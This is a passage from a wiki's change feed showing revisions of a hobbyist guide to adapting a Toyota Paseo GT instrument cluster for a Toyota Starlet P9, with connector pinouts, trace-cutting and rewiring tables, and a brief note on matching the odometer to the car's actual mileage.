|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Rewiring Traces ===&lt;br /&gt;
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 2''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 5''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Must now connect to what '''PIN 10''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Must now connect to what '''PIN 1''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC / OPEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown) &lt;br /&gt;
|-&lt;br /&gt;
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cluster mods.jpg|A picture of all the mods that have been applied.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 8''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Must now connect to what '''PIN 7''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Must now connect to what '''PIN 9''' went to&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== ODO Correction ==&lt;br /&gt;
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage.&amp;lt;br&amp;gt;&lt;br /&gt;
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble.&amp;lt;br&amp;gt;&lt;br /&gt;
In the image below you can see how I did it.&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Odo correction.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Notes on the Modification ==&lt;br /&gt;
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.&lt;br /&gt;
They must all be left OPEN FLOATING ('''important''').&lt;br /&gt;
&lt;br /&gt;
= Night time backlight =&lt;br /&gt;
[[File:Nighttime running.png|frameless|380×300px|thumb|left]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Nighttime_running.png&amp;diff=3261</id>
		<title>File:Nighttime running.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Nighttime_running.png&amp;diff=3261"/>
		<updated>2025-12-31T14:27:09Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Cluster_mods.jpg&amp;diff=3260</id>
		<title>File:Cluster mods.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Cluster_mods.jpg&amp;diff=3260"/>
		<updated>2025-12-31T14:24:13Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Clusters.png&amp;diff=3259</id>
		<title>File:Clusters.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Clusters.png&amp;diff=3259"/>
		<updated>2025-12-31T14:15:00Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3258</id>
		<title>Toyota Paseo GT 1.5 odometer Starlet P9 mod</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3258"/>
		<updated>2025-12-31T14:10:49Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: few fixes&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;WIP.&lt;br /&gt;
&lt;br /&gt;
= Modification Overview =&lt;br /&gt;
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play &amp;quot;oem-clean&amp;quot; for the '''Toyota P9''' (EP91 4E-FE 1996-1999).&amp;lt;br&amp;gt;&lt;br /&gt;
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster.&amp;lt;br&amp;gt; After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market. &lt;br /&gt;
&lt;br /&gt;
There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.&lt;br /&gt;
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==  Toyota Starlet P9 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: P30, with Tachometer by DENSO.&lt;br /&gt;
Part numbers: 83800-10060 and 157370-5241.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || IG− (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || SRS airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || SRS airbag warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Right turn signal indicator&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || E terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || T terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || F terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Paseo GT 1.5 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: L17, with Tachometer by JECO.&lt;br /&gt;
Part numbers: 83800-16080 and 82208-001.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || P (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 11 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || Open door warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || Open door warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || FU terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Upper E terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Right turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Master warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || TU terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || TE terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 15 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Instrument Cluster Wiring Modification ==&lt;br /&gt;
These are the modifications needed to be made on the GT cluster.&lt;br /&gt;
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.&lt;br /&gt;
&lt;br /&gt;
=== Cutting Traces ===&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT (cut close at FU terminal, leave room to solder)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Rewiring Traces ===&lt;br /&gt;
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 2''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 5''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Must now connect to what '''PIN 10''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Must now connect to what '''PIN 1''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC / OPEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown) &lt;br /&gt;
|-&lt;br /&gt;
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 8''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Must now connect to what '''PIN 7''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Must now connect to what '''PIN 9''' went to&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== ODO Correction ==&lt;br /&gt;
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage.&amp;lt;br&amp;gt;&lt;br /&gt;
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble.&amp;lt;br&amp;gt;&lt;br /&gt;
In the image below you can see how I did it.&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Odo correction.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Notes on the Modification ==&lt;br /&gt;
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.&lt;br /&gt;
They must all be left OPEN FLOATING ('''important''').&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Cut_double_trace_high_beam.PNG&amp;diff=3257</id>
		<title>File:Cut double trace high beam.PNG</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Cut_double_trace_high_beam.PNG&amp;diff=3257"/>
		<updated>2025-12-31T14:10:35Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: Polymorphic7 uploaded a new version of File:Cut double trace high beam.PNG&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Odo_correction.jpg&amp;diff=3256</id>
		<title>File:Odo correction.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Odo_correction.jpg&amp;diff=3256"/>
		<updated>2025-12-31T14:02:00Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Cut_double_trace_high_beam.PNG&amp;diff=3255</id>
		<title>File:Cut double trace high beam.PNG</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Cut_double_trace_high_beam.PNG&amp;diff=3255"/>
		<updated>2025-12-31T13:54:31Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3254</id>
		<title>Toyota Paseo GT 1.5 odometer Starlet P9 mod</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3254"/>
		<updated>2025-12-31T13:49:30Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;WIP.&lt;br /&gt;
&lt;br /&gt;
= Modification Overview =&lt;br /&gt;
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play &amp;quot;oem-clean&amp;quot; for the '''Toyota P9''' (EP91 4E-FE 1996-1999).&lt;br /&gt;
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market. &lt;br /&gt;
&lt;br /&gt;
There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.&lt;br /&gt;
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==  Toyota Starlet P9 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: P30, with Tachometer by DENSO.&lt;br /&gt;
Part numbers: 83800-10060 and 157370-5241.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || IG− (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || SRS airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || SRS airbag warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Right turn signal indicator&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || E terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || T terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
